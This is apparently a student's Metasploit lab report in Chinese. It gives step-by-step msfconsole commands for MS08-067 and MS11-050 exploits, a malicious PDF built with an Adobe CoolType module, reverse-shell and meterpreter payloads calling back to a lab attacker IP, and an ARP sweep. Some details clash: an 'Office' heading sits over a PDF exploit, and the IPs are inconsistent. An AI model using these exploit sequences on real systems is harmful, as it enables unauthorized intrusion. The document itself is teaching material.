《網絡對抗》Exp5 MSF基礎應用
阿新 • • 發佈:2018-04-27
offic 漏洞 以及 無奈 2.3 auxiliary 去除 win 命令
20155336《網絡對抗》Exp5 MSF基礎應用
一、基礎知識回答
- 用自己的話解釋什麽是exploit,payload,encode
- exploit:漏洞利用,與靶機進行交互,攻擊靶機的最後一步
- payload:有效載荷,後面一般加要對靶機進行攻擊的代碼,可以實現任何運行在受害者環境中的程序所能做的事情
- encode:編碼器,對代碼進行異或運算、去除壞字符等等,保護payload不被發現
二、實踐過程
- 1.Windows服務滲透攻擊——MS08-067安全漏洞
- ①攻擊機:kali ②靶機:windows XP SP3(English)
在kali中輸入msfconsole
,然後依次輸入一下命令:
- msf >
use exploit/windows/smb/ms08_067_netapi
- msf exploit(ms08_067_netapi) >
show payloads
- msf exploit(ms08_067_netapi) >
set payload generic/shell_reverse_tcp
//tcp反向回連 - msf exploit(ms08_067_netapi) >
set LHOST 172.30.4.231
//攻擊機ip - msf exploit(ms08_067_netapi) >
set LPORT 5336
//攻擊端口 - msf exploit(ms08_067_netapi) >
set RHOST 192.168.198.136
- msf exploit(ms08_067_netapi) >
set target 0
//自動選擇目標系統類型,匹配度較高 - msf exploit(ms08_067_netapi) >
exploit
//攻擊
攻擊成功結果如下:
- 2.瀏覽器滲透攻擊——MS11-050
- ①攻擊機:kali ②靶機:WindowsXP Professional sp2/Windows7專業版 ③IE版本:7.0/8.0
- 在kali中輸入
msfconsole
進入控制臺,依次輸入以下指令:- msf >
use windows/browser/ms11_050_mshtml_cobjectelement
- msf exploit(ms11_050_cobjectelement) >
set payload windows/meterpreter/reverse_http
//http反向回連 - msf exploit(ms11_050_cobjectelement) >
set LHOST 172.30.4.231
//攻擊機ip - msf exploit(ms11_050_cobjectelement) >
set LPORT 5336
//攻擊端口固定 - msf exploit(ms11_050_cobjectelement) >
set URIPATH 20155336hgy
//統一資源標識符路徑設置 - msf exploit(ms11_050_cobjectelement) >
exploit
- msf >
在瀏覽器輸入http://172.30.4.231:8080/20155336hgy
,IE出現彈窗,警告遇到問題需關閉程序:
攻擊機想要建立會話,但是靶機已經禁止了這個網頁的訪問,失敗了。IE的瀏覽器彈窗阻止了~~但是我已經關掉了防火墻,可還是錯誤。查看了kali的鏈接情況,總是沒有得到響應
總之一輸入網址,IE就會直接卡死然後報錯。參考了狄維佳同學的補救措施,還是無能為力。。萬般無奈之下,只能先告一段落惹~~
- 3.針對Office軟件的滲透攻擊——MS10-087 如出一轍的操作!!
- ①攻擊機:kali ②靶機:windowsXP Professional sp2 ③Office版本:2003
- kali輸入
msfconsole
進入控制臺 - msf >
use windows/fileformat/adobe_cooltype_sing
- msf exploit(adobe_cooltype_sing) >
set payload windows/meterpreter/reverse_tcp
//tcp反向回連 - msf exploit(adobe_cooltype_sing) >
set LHOST 172.30.5.99
//攻擊機ip - msf exploit(adobe_cooltype_sing) >
set LPORT 5336
//攻擊端口 - msf exploit(adobe_cooltype_sing) >
set FILENAME 20155336.pdf
//設置生成pdf文件的名字 - msf exploit(adobe_cooltype_sing) >
exploit
//攻擊
生成的pdf如下圖所示:
將生成的pdf文件拷貝到靶機上。
在kali上輸入back退出當前模塊,進入監聽模塊,輸入以下命令:
- msf >
use exploit/multi/handler
//進入監聽模塊 - msf exploit(handler) >
set payload windows/meterpreter/reverse_tcp
//tcp反向連接 - msf exploit(handler) >
set LHOST 192.168.5.99
//攻擊機ip - msf exploit(handler) > set LPORT 5336
- exploit
在靶機上打開201553336.pdf文件:(有一點點的卡頓~~~)
攻擊成功:
- 4.輔助模塊的應用:arp_sweep
- ①攻擊機:kali ②靶機:windowsXP Professional sp2
- show auxiliary //查看所有的輔助模塊以及用途
use auxiliary/scanner/discovery/arp_sweep
進入arp_sweep 模塊show options
---查詢模塊參數set RHOSTS 172.30.5.99
hosts主機段設置set THREADS 50
加快掃描速度run
執行
- 通過圖可以看出,使用ARP請求枚舉本地局域網絡中的所有活躍主機進行掃描。進入模塊後查詢一下參數。因為只開啟了一個XP虛擬機,所以只掃描到了一個活躍機
《網絡對抗》Exp5 MSF基礎應用